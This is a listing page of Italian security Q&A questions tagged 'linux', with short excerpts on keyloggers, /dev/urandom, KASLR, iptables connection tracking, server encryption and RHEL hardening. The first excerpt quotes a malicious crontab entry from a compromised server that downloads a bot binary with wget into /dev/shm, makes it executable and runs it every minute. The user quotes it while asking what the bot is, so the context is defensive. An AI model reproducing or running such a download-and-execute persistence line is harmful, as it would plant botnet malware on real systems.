Domande con tag 'linux'

domande con tag
3
risposte

SecureShellz è un virus bot? Come funziona?

Sto usando un server di sviluppo in cui ho trovato questo nel crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/...
posta 06.07.2012 - 09:08
2
risposte

Consiglia Keylogger per Ubuntu

Recentemente ho acquistato un nuovo laptop e sto lavorando per aumentarlo. Specificamente, sono interessato ad aumentare le mie possibilità di recuperare la macchina nel caso in cui sia mai stata rubata. Il sistema esegue Ubuntu 11.04 (Natty)....
posta 28.05.2011 - 01:57
2
risposte

Per quanto tempo ri-seminare / dev / urandom in una macchina virtuale?

Ho letto molto sulla distinzione tra /dev/random e /dev/urandom . Capisco che il consiglio prevalente è di usare /dev/urandom . La spiegazione - che 256 bit di casualità "corretta" sono tutto ciò che serve per quasi tutte le applica...
posta 15.03.2016 - 13:05
1
risposta

Determinazione degli script PHP httpd con Auditd

Sfondo Ho un problema sul mio server in cui un po 'di buchi sta permettendo di scrivere file PHP dannosi su qualsiasi directory scrivibile in tutto il mondo al di sotto della web root. Al momento non provoca alcun danno, perché ho bloccato...
posta 30.11.2016 - 17:41
2
risposte

KASLR offre davvero più sicurezza contro gli exploit?

So tutto su come funziona ASLR e come è stato implementato su entrambi i sistemi Linux e Windows. Fornisce un ulteriore livello di protezione che il malware deve prendere in considerazione. Ma oggigiorno con i computer lasciati accesi per lung...
posta 06.10.2014 - 14:39
1
risposta

Slot machine segfault: cosa possiamo determinare?

Siamo entrati in un casinò e l'abbiamo visto vicino all'ingresso. Non ho una domanda specifica, ma c'è qualcosa che sarebbe interessante condividere e spiegare dall'immagine?     
posta 07.01.2013 - 07:53
1
risposta

È sicuro disabilitare il tracciamento della connessione in iptables?

Durante la lettura del NOTRACK target della tabella raw in iptables, ho riscontrato un articolo che suggeriva che per un determinato traffico potevi (o dovresti) disabilitare il tracciamento della connessione. I due esempi erano: (1) t...
posta 13.07.2014 - 08:41
2
risposte

Come crittografare i dati sul server?

Ho alcuni dati sul server (con Linux in esecuzione) che deve essere crittografato (politica aziendale). Questi dati vengono offerti da un'applicazione in esecuzione su questa macchina. Ora considero alcune possibilità: 1) Cripta solo la parti...
posta 07.05.2013 - 08:39
3
risposte

Impedisci i keylogger su Linux?

Esistono meccanismi nell'architettura desktop Linux per impedire i keylogger del software dannoso? Quale sarebbe una configurazione Linux ideale per rendere molto difficile per un utente malintenzionato installare un keylogger sul sistema di des...
posta 01.05.2016 - 13:38
2
risposte

Risorse disponibili per la protezione di RHEL 6

Alcuni membri del nostro gruppo di infrastrutture vogliono eseguire l'upgrade per iniziare a sfruttare le nuove funzionalità di RHEL 6. In passato, mi sono basato sul NSA Guide per proteggere le installazioni di RHEL 5 e CentOS 5. Trovo questa...
posta 09.03.2012 - 18:16